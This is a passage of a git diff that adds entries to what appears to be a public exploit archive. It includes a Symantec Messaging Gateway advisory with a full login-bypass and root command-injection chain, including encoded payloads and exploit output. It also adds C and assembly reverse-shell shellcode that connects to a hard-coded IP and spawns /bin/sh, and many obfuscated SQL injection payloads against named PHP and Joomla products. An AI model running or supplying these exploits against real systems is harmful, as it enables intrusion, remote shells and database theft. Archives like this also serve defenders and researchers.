+	6. Locate the valueAsString parameter inside the JSON payload
+	7. Append SQL code to the end of the value held by the valueAsString parameter, example: {"enabled":true,"emptyMessage":"Username","validationText":"fakeuser","valueAsString":"fakeuser';waitfor delay'0:0:10'--","lastSetTextBoxValue":"fakeuser"}
+
+	
+Solution
+================
+"SunGard Public Sector appreciates that this issue has been brought to our attention.   Our development team has addressed this report with a patch release.  Please contact the SunGard Public Sector TRAKiT Solutions division to request the patch release.  (858) 451-3030." -- (https://www.kb.cert.org/vuls/id/846103)
+
+
+Timeline
+================
+2016-10-17: Discovered
+2016-12-6: CVE Issued
+
+
+Discovered by
+================
+Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
+
+
+About Illumant
+================
+Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/
\ No newline at end of file
diff --git a/platforms/jsp/webapps/42519.txt b/platforms/jsp/webapps/42519.txt
new file mode 100755
index 000000000..74eb90c2f
--- /dev/null
+++ b/platforms/jsp/webapps/42519.txt
@@ -0,0 +1,183 @@
+This is an advisory for CVE-2017-6327 which is an unauthenticated remote
+code execution flaw in the web interface of Symantec Messaging Gateway
+prior to and including version 10.6.3-2, which can be used to execute
+commands as root.
+
+Symantec Messaging Gateway, formerly known as Brightmail, is a linux-based
+anti-spam/security product for e-mail servers. It is deployed as a physical
+device or with ESX in close proximity to the servers it is designed to
+protect.
+
+=*=*=*=*=*=*=*=*=    TIMELINE
+
+2017-07-07: Reported to Symantec
+2017-08-10: Patch and notice released by Symantec [1]
+2017-08-18: Public technical advisory
+
+=*=*=*=*=*=*=*=*=    DESCRIPTION
+
+- Bug #1: Web authentication bypass
+
+The web management interface is available via HTTPS, and you can't do much
+without logging in.
+
+If the current session (identified by the `JSESSIONID` cookie) has the
+`user` attribute set, the session is considered authenticated.
+
+The file LoginAction.class defines a number of public methods and they can
+all be reached via unauthenticated web requests.
+
+By making a GET request to `/brightmail/action1.do?method=method_name` we
+can execute `LoginAction.method_name` if `method_name` is a public method.
+
+One such public method which will be the target of our authentication
+bypass is called `LoginAction.notificationLogin`.
+
+It does the following:
+
+1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`
+2. Creates a new `UserTO` object using the decrypted `notify` parameter as
+an email value
+3. Creates a new session, invalidating the old one if necessary
+4. Sets the `user` attribute of the newly created session to our
+constructed UserTO object
+
+It essentially takes a username value from a GET parameter and logs you in
+as this user if it exists. If not, it creates this user for you.
+
+We need to encrypt our `notify` argument so that
+`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the
+encryption is just PBEWithMD5AndDES using a static password, conveniently
+included in the code itself. I won't include the encryption password or a
+fully encrypted notify string in this post.
+
+
+Example request:
+
+GET
+/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test
+HTTP/1.1
+...
+
+
+HTTP/1.1 302 Found
+Server: Apache-Coyote/1.1
+...
+Set-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;
+Secure; HttpOnly
+
+
+- Bug #2: Command injection
+
+The RestoreAction.performRestore method can be reached with an
+authenticated session and it takes the restoreSource and
+localBackupFilename parameters.
+
+After a long chain of function calls, localBackupFilename ends up being
+sent to the local "bmagent" daemon listening on port 41002. It will execute
+/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied
+value.
+
+The db-restore script is a sudo wrapper for
+/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl
+script containing a command injection in a call to /usr/bin/du.
+
+$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;"`id`";'
+/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory
+sh: uid=0(root) gid=0(root) groups=0(root): command not found
+ERROR: Failed to copy 'asdf;"`id`";' from local backup store: No such file
+or directory
+
+
+This command injection can be exploited from the web management interface
+with a valid session, which we can create using bug #1.
+
+- Combining bug #1 and #2
+
+The last step is to get a CSRF token since the vulnerable performRestore
+function is annotated with @CSRF.
+
+After some quick digging it turns out that all you need to do is call
+/brightmail/common.jsp to get a token that will be valid for all your
+requests.
+
+The URL-encoded value we provide for the `localBackupFileSelection`
+parameter is:
+asdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname
+-a>>/data/bcc/webapps/brightmail/output.txt`hehehe
+
+Request:
+
+GET
+/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65
+HTTP/1.1
+Host: 192.168.205.220
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)
+Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Cookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+Response:
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Cache-Control: no-store,no-cache
+Pragma: no-cache
+Expires: Thu, 01 Jan 1970 00:00:00 GMT
+X-Frame-Options: SAMEORIGIN
+Content-Type: text/html;charset=UTF-8
+Content-Length: 803
+Date: Thu, 29 Jun 2017 06:48:12 GMT
+Connection: close
+
+<HTML>
+<title>Symantec Messaging Gateway -&nbsp;Restore</title>
+...
+
+
+Now to confirm that our command output was correctly placed in a file
+inside the webroot.
+
+imac:~% curl -k https://192.168.205.220/brightmail/output.txt
+uid=0(root) gid=0(root) groups=0(root)
+Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
+22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+
+
+=*=*=*=*=*=*=*=*=    EXPLOIT OUTPUT
+
+imac:~/brightmail% python brightmail-rce.py
+https://192.168.205.220/brightmail
+bypassing login..
+* JSESSIONID=693079639299816F80016123BE8A0167
+verifying login bypass..
+* Version: 10.6.3
+getting csrf token..
+* 1e35af8c567d3448a65c8516a835cec30b6b8b73
+done, verifying..
+
+uid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)
+groups=0(root),99(nobody),499(mysql),502(bcc)
+Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13
+22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+
+
+# cat /etc/issue
+
+Symantec Messaging Gateway
+Version 10.6.3-2
+Copyright (c) 1998-2017 Symantec Corporation.  All rights reserved.
+
+
+=*=*=*=*=*=*=*=*=    REFERENCES
+
+[1]
+https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00
+
+=*=*=*=*=*=*=*=*=    CREDIT
+
+Philip Pettersson
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/42485.c b/platforms/lin_x86-64/shellcode/42485.c
new file mode 100755
index 000000000..329d9bffc
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/42485.c
@@ -0,0 +1,105 @@
+/*
+;Title: Linux/x86_64 - Reverse Shell Shellcode (192.168.1.2:4444)
+;Author: Touhid M.Shaikh
+;Contact: https://github.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86_64
+;Description: Reverse Shell, Run nc and listen port  4444.
+;Shellcode Length:  153
+;Tested on :  Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
+
+
+
+===COMPILATION AND EXECUTION Assemmbly file===
+
+#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
+
+#ld shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+global _start
+
+
+_start:
+xor rax,rax
+add rax, 41
+xor rdi,rdi
+mov rdx, rdi
+add rdi, 2
+xor rsi,rsi
+add rsi, 1
+syscall
+
+mov rdi, rax
+
+xor rax, rax
+push rax
+add rax,0x2
+mov dword [rsp-4], 0x0201a8c0       : IP : 192.168.1.2, Change what u
+want(Little Endian)
+mov word [rsp-6], 0x5c11            ; PORT : 4444, Change what u
+want(Little Endian)
+mov word [rsp-8], ax
+sub rsp, 8
+add rax, 40
+mov rsi, rsp
+xor rdx,rdx
+add rdx, 16
+syscall
+xor rax,rax
+mov rsi, rax
+add rax, 33
+    syscall
+    xor rax,rax
+    add rax, 33
+    xor rsi,rsi
+    add rsi, 1
+    syscall
+    xor rax, rax
+    add rax, 33
+    xor rsi,rsi
+    add rsi, 2
+    syscall
+    xor rax, rax
+    push rax
+    mov rbx, 0x68732f2f6e69622f
+    push rbx
+    mov rdi, rsp
+push rax
+    mov rdx, rsp
+    push rdi
+    mov rsi, rsp
+    add rax, 59
+    syscall
+
+===================END HERE============================
+
+====================FOR C Compile===========================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+
+unsigned char code[] = \
+"\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x89\xfa\x48\x83\xc7\x02\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x48\x83\xc0\x02\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x11\x5c\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x83\xc0\x28\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x89\xc6\x48\x83\xc0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
+
+main()
+{
+
+printf("Shellcode Length:  %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
diff --git a/platforms/php/webapps/42482.txt b/platforms/php/webapps/42482.txt
new file mode 100755
index 000000000..2b8fc7bd8
--- /dev/null
+++ b/platforms/php/webapps/42482.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Food Ordering Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 17.08.2017
+# Vendor Homepage : http://www.earthtechnology.co.in/our_products.html
+# Software Link: https://www.foodorderingscript.com/
+# Demo: https://www.foodorderingscript.com/demo-new/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/restaurantDetails.php?resid=[SQL]
+# 
+# 1'+/*!00600aNd*/(/*!00600SelEcT*/+0x30783331+/*!00600fRoM*/+(/*!00600SelEcT*/+CoUnT(*),/*!00600cOncaT*/((/*!00600SeleCT*/(/*!00600SeleCT*/+/*!00600cOncaT*/(cAST(daTabAsE()+aS+/*!00600cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00600fRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00600wHERE*/+tABLE_sCHEMA=daTabAsE()+lIMIT+0,1),fLooR(/*!00600rAND*/(0)*2))x+/*!00600fRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00600aNd*/+''='
+# 
+# http://localhost/[PATH]/search1det.php?action=orderFullDetails&orderid=[SQL]
+# 
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/42487.txt b/platforms/php/webapps/42487.txt
new file mode 100755
index 000000000..b9323ec9c
--- /dev/null
+++ b/platforms/php/webapps/42487.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: LiveCRM 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/livecrm-complete-business-management-solution/20249151
+# Demo: http://demo.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the working user group to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
+# 64+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# http://localhost/[PATH]/index.php?r=sales/lead/view&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=invoice/invoice/view&id=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42488.txt b/platforms/php/webapps/42488.txt
new file mode 100755
index 000000000..65c52d8e3
--- /dev/null
+++ b/platforms/php/webapps/42488.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: LiveSupport 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/livesupport-complete-ticketing-system-crm/20243447
+# Demo: http://livesupport.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?Ticket[queue_id]=2&r=support/ticket/queue&id=[SQL]
+# 2&r=support/ticket/queue&id=22+/*!44455PrOceDure*/+/*!44455AnaLysE*/+(eXtrActvAlue(0,/*!44455concat*/(0x27,0x3a,version(),0x7e,database())),0)--+-
+# 
+# http://localhost/[PATH]/index.php?r=support/ticket-resolution/update&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=support/ticket/update&id=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42489.txt b/platforms/php/webapps/42489.txt
new file mode 100755
index 000000000..c4cffbdb5
--- /dev/null
+++ b/platforms/php/webapps/42489.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: LiveInvoices 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/liveinvoices-complete-invoicing-system-crm/20243375
+# Demo: http://liveinvoices.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
+# 62++/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# http://localhost/[PATH]/index.php?r=invoice/invoice/view&id=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42490.txt b/platforms/php/webapps/42490.txt
new file mode 100755
index 000000000..22098bcac
--- /dev/null
+++ b/platforms/php/webapps/42490.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: LiveSales 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/livesales-complete-sales-management-crm/20243171
+# Demo: http://livesales.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
+# 65+/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# http://localhost/[PATH]/index.php?r=sales/lead/view&id=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42491.txt b/platforms/php/webapps/42491.txt
new file mode 100755
index 000000000..cee0b5d76
--- /dev/null
+++ b/platforms/php/webapps/42491.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: LiveProjects 1.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://livecrm.co/
+# Software Link: https://codecanyon.net/item/liveprojects-complete-project-management-crm/10436800
+# Demo: http://liveprojects.livecrm.co/livecrm/web/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the users to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=pmt/task/task-view&id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?r=pmt/project/project-view&id=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42492.txt b/platforms/php/webapps/42492.txt
new file mode 100755
index 000000000..f69b263bc
--- /dev/null
+++ b/platforms/php/webapps/42492.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Joomla! Component Appointment v1.1 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Software Link: https://extensions.joomla.org/extensions/extension/appointment/
+# Demo: http://joomlaextension.biz/appointment/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows the working user group to inject sql commands ...
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php/service-list?view=allorder&ser_id=[SQL] 
+# -84+/*!11111union*/+/*!11111select*/+(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32))--+-
+# 
+# http://localhost/[PATH]/index.php/service-list?view=allorder&emp_id=[SQL]
+# 
+# <input type="hidden" name="sername" id="sername" value="............
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42493.txt b/platforms/php/webapps/42493.txt
new file mode 100755
index 000000000..2da12c3f1
--- /dev/null
+++ b/platforms/php/webapps/42493.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: Joomla! Component Twitch Tv 1.1 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://www.raindropsinfotech.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/game-servers/twitch-tv-component/
+# Demo: http://www.raindropsinfotech.com/example/twitch.tv
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_twitchtv&view=twitch&username=[SQL]
+# gobgg'++aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((sELECT(sELECT+/*!22223CONCAT*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+aNd+''='
+# 
+# http://localhost/[PATH]/index.php?option=com_twitchtv&view=gamecenter&id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42494.txt b/platforms/php/webapps/42494.txt
new file mode 100755
index 000000000..d57391c90
--- /dev/null
+++ b/platforms/php/webapps/42494.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component KissGallery 1.0.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage: http://terrywcarter.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/kissgallery/
+# Demo: http://demo.terrywcarter.com/kissgallery
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/kissgallery/1[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42496.txt b/platforms/php/webapps/42496.txt
new file mode 100755
index 000000000..14fa7d124
--- /dev/null
+++ b/platforms/php/webapps/42496.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Matrimony Script 2.7 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://www.matrimony-script.com/
+# Software Link: http://www.matrimony-script.com/php-matrimony-software.html
+# Demo: http://www.matrimonysearch.com/
+# Version: 2.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/wedding.php?category=[SQL]&city=[SQL]
+# 
+# http://localhost/[PATH]/homeads.php?id=[SQL]
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42497.txt b/platforms/php/webapps/42497.txt
new file mode 100755
index 000000000..16c4bb15f
--- /dev/null
+++ b/platforms/php/webapps/42497.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: eCardMAX 10.5 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : https://www.ecardmax.com/
+# Software Link: https://www.ecardmax.com/home/ecardmax/
+# Demo: https://ecardmax.com/ecardmaxdemo/
+# Version: 10.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# view-source:http://localhost/[PATH]/cards/sendcard/[SQL]
+# 727+union+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x64656465--+-/0x496873616e53656e63616e
+# 
+# http://localhost/[PATH]/category/[SQL]
+# 11'+aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((/*!22223sELECT*/(/*!22223sELECT*/+/*!22223CONCAT*/(cAST(dATABASE()+aS+/*!22223cHAR*/),0x7e,0x496873616E53656e63616e))+/*!22223fROM*/+iNFORMATION_sCHEMA.tABLES+/*!22223wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!22223rAND*/(0)*2))x+/*!22223fROM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!22223aNd*/+''='/0x496873616e53656e63616e
+# 
+# http://localhost/[PATH]/invitation/[SQL]
+# 15'+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''='/0x496873616e53656e63616e
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42499.txt b/platforms/php/webapps/42499.txt
new file mode 100755
index 000000000..dbb90eb0d
--- /dev/null
+++ b/platforms/php/webapps/42499.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: SOA School Management 3.0 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : https://ynetinteractive.com/
+# Software Link: http://codecanyon.net/item/soa-school-management-software-with-integrated-parents-students-portal/20435367?s_rank=3
+# Demo: http://demo.ynetinteractive.com/soa/
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# http://localhost/[PATH]/drivers/jquery/usersession_exam.php?id=[SQL]
+# http://localhost/[PATH]/drivers/jquery/session_exam.php?id=[SQL]
